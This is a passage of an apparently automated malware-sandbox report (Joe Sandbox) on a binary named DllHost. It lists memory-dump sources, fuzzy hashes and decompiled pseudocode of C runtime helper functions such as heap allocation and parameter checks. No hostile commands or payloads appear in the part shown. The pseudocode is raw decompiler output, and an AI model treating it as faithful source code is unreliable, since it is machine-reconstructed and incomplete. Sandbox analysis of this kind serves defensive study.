                                                                                                                                                              0x7ff7191e89c2
                                                                                                                                                              0x7ff7191e89cb
                                                                                                                                                              0x7ff7191e89d2
                                                                                                                                                              0x7ff7191e89d4
                                                                                                                                                              0x7ff7191e89d9
                                                                                                                                                              0x7ff7191e89dc
                                                                                                                                                              0x7ff7191e89e1
                                                                                                                                                              0x7ff7191e8a08

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: b79a8663bd318cae38259f11cb5ddf4d0f184025f721f87a4480240d22a0a1df
                                                                                                                                                              • Instruction ID: 2dbfd6bc6e022ac0b8a23a179335423b72f346523aef65bac13d95be44573319
                                                                                                                                                              • Opcode Fuzzy Hash: b79a8663bd318cae38259f11cb5ddf4d0f184025f721f87a4480240d22a0a1df
                                                                                                                                                              • Instruction Fuzzy Hash: 2E318422E18A4186F742BF55A441378AAB0ABC0778F810175DA1D133D2CF7CE48BE332
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E6760 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E00007FF77FF7191E6760(signed long long __ebx, signed int __ecx, signed int __edi, signed int* __rax, long long __rbx, void* __rdx, long long __rsi, signed int _a8, long long _a16, long long _a24) {
				signed long long _t33;
				void* _t43;
				signed int* _t50;
				signed long long _t58;
				void* _t63;
				void* _t64;
				signed long long _t65;

				_t33 = __ebx;
				_a16 = __rbx;
				_a24 = __rsi;
				_a8 = __ecx;
				r14d = r8d;
				if (__ebx != 0xfffffffe) goto 0x191e67a1;
				E00007FF77FF7191DC834(__rax);
				 *__rax =  *__rax & 0x00000000;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 9;
				goto 0x191e6830;
				if (__ecx < 0) goto 0x191e6818;
				_t43 = _t33 -  *0x1921bb00; // 0x40
				if (_t43 >= 0) goto 0x191e6818;
				_t58 = __ecx >> 6;
				_t65 = __ecx + __ecx * 8;
				if (( *( *((intOrPtr*)(0x1921b700 + _t58 * 8)) + 0x38 + _t65 * 8) & 0x00000001) == 0) goto 0x191e6818;
				E00007FF77FF7191EAB1C();
				_t50 =  *((intOrPtr*)(0x1921b700 + _t58 * 8));
				if (( *(_t50 + 0x38 + _t65 * 8) & 0x00000001) != 0) goto 0x191e67fe;
				E00007FF77FF7191DC854(_t50);
				 *_t50 = 9;
				E00007FF77FF7191DC834(_t50);
				 *_t50 =  *_t50 & 0x00000000;
				goto 0x191e680d;
				r8d = r14d;
				E00007FF77FF7191E684C(__ebx, __edi | 0xffffffff, _t50, __ecx, __rdx, _t63, _t64); // executed
				E00007FF77FF7191EAC04();
				goto 0x191e6833;
				E00007FF77FF7191DC834(_t50);
				 *_t50 =  *_t50 & 0x00000000;
				E00007FF77FF7191DC854(_t50);
				 *_t50 = 9;
				return E00007FF77FF7191DA5D8() | 0xffffffff;
			}










                                                                                                                                                              0x7ff7191e6760
                                                                                                                                                              0x7ff7191e6760
                                                                                                                                                              0x7ff7191e6765
                                                                                                                                                              0x7ff7191e676a
                                                                                                                                                              0x7ff7191e677b
                                                                                                                                                              0x7ff7191e6787
                                                                                                                                                              0x7ff7191e6789
                                                                                                                                                              0x7ff7191e678e
                                                                                                                                                              0x7ff7191e6791
                                                                                                                                                              0x7ff7191e6796
                                                                                                                                                              0x7ff7191e679c
                                                                                                                                                              0x7ff7191e67a3
                                                                                                                                                              0x7ff7191e67a5
                                                                                                                                                              0x7ff7191e67ab
                                                                                                                                                              0x7ff7191e67b3
                                                                                                                                                              0x7ff7191e67c1
                                                                                                                                                              0x7ff7191e67d0
                                                                                                                                                              0x7ff7191e67d4
                                                                                                                                                              0x7ff7191e67dc
                                                                                                                                                              0x7ff7191e67e7
                                                                                                                                                              0x7ff7191e67e9
                                                                                                                                                              0x7ff7191e67ee
                                                                                                                                                              0x7ff7191e67f4
                                                                                                                                                              0x7ff7191e67f9
                                                                                                                                                              0x7ff7191e67fc
                                                                                                                                                              0x7ff7191e67fe
                                                                                                                                                              0x7ff7191e6806
                                                                                                                                                              0x7ff7191e680f
                                                                                                                                                              0x7ff7191e6816
                                                                                                                                                              0x7ff7191e6818
                                                                                                                                                              0x7ff7191e681d
                                                                                                                                                              0x7ff7191e6820
                                                                                                                                                              0x7ff7191e6825
                                                                                                                                                              0x7ff7191e684a

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 614131673d0d5983eebf505d5c9c04080b00715942a6ba4dea99e7fb16957a48
                                                                                                                                                              • Instruction ID: 2b8018f1623bf2a391fe41f1efed56bd9c5f9c997fbac1914bc80cf1974d28b4
                                                                                                                                                              • Opcode Fuzzy Hash: 614131673d0d5983eebf505d5c9c04080b00715942a6ba4dea99e7fb16957a48
                                                                                                                                                              • Instruction Fuzzy Hash: DB21A322E18A4646F742BF11A84173CA6B0AB807B8FD44934E91D173D2CE7CE8CB9720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F38BC Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191F38BC(intOrPtr* __rax, long long __rbx, long long _a8, intOrPtr _a40) {

				_a8 = __rbx;
				if (_a40 != 0) goto 0x191f38f1;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				E00007FF77FF7191DA5D8();
				return 0x16;
			}



                                                                                                                                                              0x7ff7191f38bc
                                                                                                                                                              0x7ff7191f38d1
                                                                                                                                                              0x7ff7191f38d3
                                                                                                                                                              0x7ff7191f38dd
                                                                                                                                                              0x7ff7191f38df
                                                                                                                                                              0x7ff7191f38f0

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: 94cfdba95cb9f1173952f890fba6cf35439c0c9803fb76d0777186a914c53558
                                                                                                                                                              • Instruction ID: da689ceb0ec74c5ef875715135495af6b0d5bf863b031327723de123bef94ded
                                                                                                                                                              • Opcode Fuzzy Hash: 94cfdba95cb9f1173952f890fba6cf35439c0c9803fb76d0777186a914c53558
                                                                                                                                                              • Instruction Fuzzy Hash: 21218632A08A4547EB619F18E440379B6B0FB84BA8F944234D75D476D9EF3DD48BDB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DD4F0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00007FF77FF7191DD4F0(intOrPtr* __rax, long long __rbx, long long __rcx, long long _a8, long long _a16) {

				r8d = 0x40;
				goto 0x191dd42c;
				asm("int3");
				_a16 = __rbx;
				_a8 = __rcx;
				if (__rcx != 0) goto 0x191dd532;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				return E00007FF77FF7191DA5D8();
			}



                                                                                                                                                              0x7ff7191dd4f0
                                                                                                                                                              0x7ff7191dd4f6
                                                                                                                                                              0x7ff7191dd4fb
                                                                                                                                                              0x7ff7191dd4fc
                                                                                                                                                              0x7ff7191dd501
                                                                                                                                                              0x7ff7191dd511
                                                                                                                                                              0x7ff7191dd513
                                                                                                                                                              0x7ff7191dd518
                                                                                                                                                              0x7ff7191dd531

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: d2bab4befcdc2425bbeb2248411935522ecd43e52291b029098dd4d43bbfbca4
                                                                                                                                                              • Instruction ID: 228db71580a7fa7100af7915c9c507c8bb994069b9e385022fdade3d1f9e41fa
                                                                                                                                                              • Opcode Fuzzy Hash: d2bab4befcdc2425bbeb2248411935522ecd43e52291b029098dd4d43bbfbca4
                                                                                                                                                              • Instruction Fuzzy Hash: E9119325E1CA4141FB52BE11B404379D2F0AF81BA8FD44434EA4C07E85CF6CF98AA760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EAA74 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191EAA74(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x191eaabc;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 9;
				E00007FF77FF7191DA5D8();
				return 9;
			}



                                                                                                                                                              0x7ff7191eaa74
                                                                                                                                                              0x7ff7191eaa79
                                                                                                                                                              0x7ff7191eaa7e
                                                                                                                                                              0x7ff7191eaa91
                                                                                                                                                              0x7ff7191eaa93
                                                                                                                                                              0x7ff7191eaa9d
                                                                                                                                                              0x7ff7191eaa9f
                                                                                                                                                              0x7ff7191eaabb

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: 916b0a1d7e4077e872f60012507b6f9c692079abd0a1790d589d1f6d4eb9da05
                                                                                                                                                              • Instruction ID: 332e29d9ba012c01ec3ddb5bb33e6bf6c7379304a2a087dc98812e0e2713f73d
                                                                                                                                                              • Opcode Fuzzy Hash: 916b0a1d7e4077e872f60012507b6f9c692079abd0a1790d589d1f6d4eb9da05
                                                                                                                                                              • Instruction Fuzzy Hash: 7C118B36908B46C2F301AF04B880539E2B0FB84768F850434EA4D57696DE3CF89AA720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D99CC Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191D99CC(long long __rcx, long long __rdx, long long __r8, long long __r9) {
				intOrPtr* _t12;
				intOrPtr* _t18;

				_t12 = _t18;
				 *((long long*)(_t12 + 0x20)) = __r9;
				 *((long long*)(_t12 + 0x18)) = __r8;
				 *((long long*)(_t12 + 0x10)) = __rdx;
				 *((long long*)(_t12 + 8)) = __rcx;
				if (__rdx == 0) goto 0x191d9a06;
				if (__r8 == 0) goto 0x191d9a06;
				if (__r9 != 0) goto 0x191d9a0e;
				E00007FF77FF7191DC854(_t12);
				 *_t12 = 0x16;
				E00007FF77FF7191DA5D8();
				return 0;
			}





                                                                                                                                                              0x7ff7191d99cc
                                                                                                                                                              0x7ff7191d99cf
                                                                                                                                                              0x7ff7191d99d3
                                                                                                                                                              0x7ff7191d99d7
                                                                                                                                                              0x7ff7191d99db
                                                                                                                                                              0x7ff7191d99ea
                                                                                                                                                              0x7ff7191d99ef
                                                                                                                                                              0x7ff7191d99f4
                                                                                                                                                              0x7ff7191d99f6
                                                                                                                                                              0x7ff7191d99fb
                                                                                                                                                              0x7ff7191d9a01
                                                                                                                                                              0x7ff7191d9a0d

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: b2bd58795c0cd1930218e9f79be95c0d888443158f2867e2966133bed9afe245
                                                                                                                                                              • Instruction ID: 15f905c07878ffc0407b11e7344f5db7f2e75339992e28c22df93c1816002f53
                                                                                                                                                              • Opcode Fuzzy Hash: b2bd58795c0cd1930218e9f79be95c0d888443158f2867e2966133bed9afe245
                                                                                                                                                              • Instruction Fuzzy Hash: 66012772A00F5698FB00EFA0E4454EC77F9AB2435CB940125DA4C13748DF34D2AAD390
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C86E0 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E00007FF77FF7191C86E0() {
				signed int _v24;
				long long _v32;
				signed long long _v40;
				signed long long _v56;
				void* __rbx;
				signed char _t12;
				void* _t16;
				signed long long _t21;
				signed long long _t22;
				long long _t26;
				long long _t27;
				intOrPtr _t33;
				long long _t36;
				signed long long _t37;
				void* _t38;

				_t21 =  *0x192190a0; // 0x590452ce5669
				_t22 = _t21 ^ _t37;
				_v24 = _t22;
				_v56 = _t22;
				_v32 = 0xf;
				_v40 = _t22;
				_v56 = 0;
				_t12 = E00007FF77FF7191C8870(_t26, _t27,  &_v56, _t36, _t38); // executed
				_t33 = _v32;
				if (_t33 - 0x10 < 0) goto 0x191c8754;
				if (_t33 + 1 - 0x1000 < 0) goto 0x191c874f;
				if (_v56 -  *((intOrPtr*)(_v56 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c876a;
				0x191d23d0();
				return E00007FF77FF7191D23B0(_t12 & 0xff, _t16, _v24 ^ _t37);
			}


















                                                                                                                                                              0x7ff7191c86e6
                                                                                                                                                              0x7ff7191c86ed
                                                                                                                                                              0x7ff7191c86f0
                                                                                                                                                              0x7ff7191c86f7
                                                                                                                                                              0x7ff7191c86fc
                                                                                                                                                              0x7ff7191c8705
                                                                                                                                                              0x7ff7191c870a
                                                                                                                                                              0x7ff7191c8713
                                                                                                                                                              0x7ff7191c871b
                                                                                                                                                              0x7ff7191c8724
                                                                                                                                                              0x7ff7191c8738
                                                                                                                                                              0x7ff7191c874d
                                                                                                                                                              0x7ff7191c874f
                                                                                                                                                              0x7ff7191c8769

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: afb5f9ac2f985d6b494cec3eb2d6ff23a373e22717d593a0aba047ed3cb20f6f
                                                                                                                                                              • Instruction ID: 15e09efc08c37c9312bb03b81d2a1d0f99c72b6f0d3108deded2ef54e5c134bc
                                                                                                                                                              • Opcode Fuzzy Hash: afb5f9ac2f985d6b494cec3eb2d6ff23a373e22717d593a0aba047ed3cb20f6f
                                                                                                                                                              • Instruction Fuzzy Hash: 1A017562A28A8545FA50AB24F44536AA2B1AB887B8F800331E6AD466D5EE2CD0D59610
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7598 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00007FF77FF7191E7598(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x191e75b7;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x191e75fa;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x191e75de;
				if (E00007FF77FF7191E3FDC() == 0) goto 0x191e75fa;
				if (E00007FF77FF7191E1868(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x191e75fa;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x191e75c9;
				goto 0x191e7607;
				E00007FF77FF7191DC854(_t22);
				 *_t22 = 0xc;
				return 0;
			}





                                                                                                                                                              0x7ff7191e7598
                                                                                                                                                              0x7ff7191e75a7
                                                                                                                                                              0x7ff7191e75ab
                                                                                                                                                              0x7ff7191e75ab
                                                                                                                                                              0x7ff7191e75b5
                                                                                                                                                              0x7ff7191e75c3
                                                                                                                                                              0x7ff7191e75c7
                                                                                                                                                              0x7ff7191e75d0
                                                                                                                                                              0x7ff7191e75dc
                                                                                                                                                              0x7ff7191e75ed
                                                                                                                                                              0x7ff7191e75f6
                                                                                                                                                              0x7ff7191e75f8
                                                                                                                                                              0x7ff7191e75fa
                                                                                                                                                              0x7ff7191e75ff
                                                                                                                                                              0x7ff7191e760c

                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7191E5C9D,?,?,8000000000000000,00007FF7191DC85D,?,?,?,?,00007FF7191E6B4D), ref: 00007FF7191E75ED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: b4a9ef949f8891399e331c60ceaf5fc216f5b990c4c492bde04ecfb103d583ee
                                                                                                                                                              • Instruction ID: 285c745808a92f021a0115d0c9a810e8682ef8c6506ce6a8f75ae0b683b7be5e
                                                                                                                                                              • Opcode Fuzzy Hash: b4a9ef949f8891399e331c60ceaf5fc216f5b990c4c492bde04ecfb103d583ee
                                                                                                                                                              • Instruction Fuzzy Hash: 09F0AF04F09A0742FE5ABE6578103B482B15F49768FCC4430C90EA62C1EE1CE4CFA131
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E82BC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00007FF77FF7191E82BC(intOrPtr* __rax, void* __rcx) {

				if (__rcx - 0xffffffe0 > 0) goto 0x191e8307;
				_t16 =  ==  ? __rax : __rcx;
				goto 0x191e82ee;
				if (E00007FF77FF7191E3FDC() == 0) goto 0x191e8307;
				if (E00007FF77FF7191E1868(__rax,  ==  ? __rax : __rcx) == 0) goto 0x191e8307;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0x191e82d9;
				goto 0x191e8314;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0xc;
				return 0;
			}



                                                                                                                                                              0x7ff7191e82c9
                                                                                                                                                              0x7ff7191e82d3
                                                                                                                                                              0x7ff7191e82d7
                                                                                                                                                              0x7ff7191e82e0
                                                                                                                                                              0x7ff7191e82ec
                                                                                                                                                              0x7ff7191e82fa
                                                                                                                                                              0x7ff7191e8303
                                                                                                                                                              0x7ff7191e8305
                                                                                                                                                              0x7ff7191e8307
                                                                                                                                                              0x7ff7191e830c
                                                                                                                                                              0x7ff7191e8319

                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF7191E3836,123,00000000,00000000,?,?,00007FF7191E3BA5), ref: 00007FF7191E82FA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: 2c07edc68b90d74578bb2b05f29fd1479fce953ad991f8cbb6c7ba9d3532caa2
                                                                                                                                                              • Instruction ID: f1317376a6a34823c9ef4d8ce91cc4d17882dfac1ad4e77b13b4fe743b244ff0
                                                                                                                                                              • Opcode Fuzzy Hash: 2c07edc68b90d74578bb2b05f29fd1479fce953ad991f8cbb6c7ba9d3532caa2
                                                                                                                                                              • Instruction Fuzzy Hash: AEF03A00F08E4746FA567E62784067591B15F44778F880670DD2E952C1DE1CE4CBE132
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D1CA8 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RtlEncodePointer.NTDLL(?,?,?,?,00007FF7191D1395,?,?,00000000,00007FF7191D1189,?,?,?,00007FF7191BB03B), ref: 00007FF7191D1CB6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2118026453-0
                                                                                                                                                              • Opcode ID: 1252d47fc620bb06a527e8cdad921947cee60a4209efeb817a6077a81d70148e
                                                                                                                                                              • Instruction ID: 899368ce9cfad16cf93c750f0db7cccd77158a171f923988b233f52c7f50f244
                                                                                                                                                              • Opcode Fuzzy Hash: 1252d47fc620bb06a527e8cdad921947cee60a4209efeb817a6077a81d70148e
                                                                                                                                                              • Instruction Fuzzy Hash: DFE0B6B8E49E07D1FA087F41BC843B4A2B4BB44728FD00031D50D422609E2CA1EEC621
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E6B28 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 68%
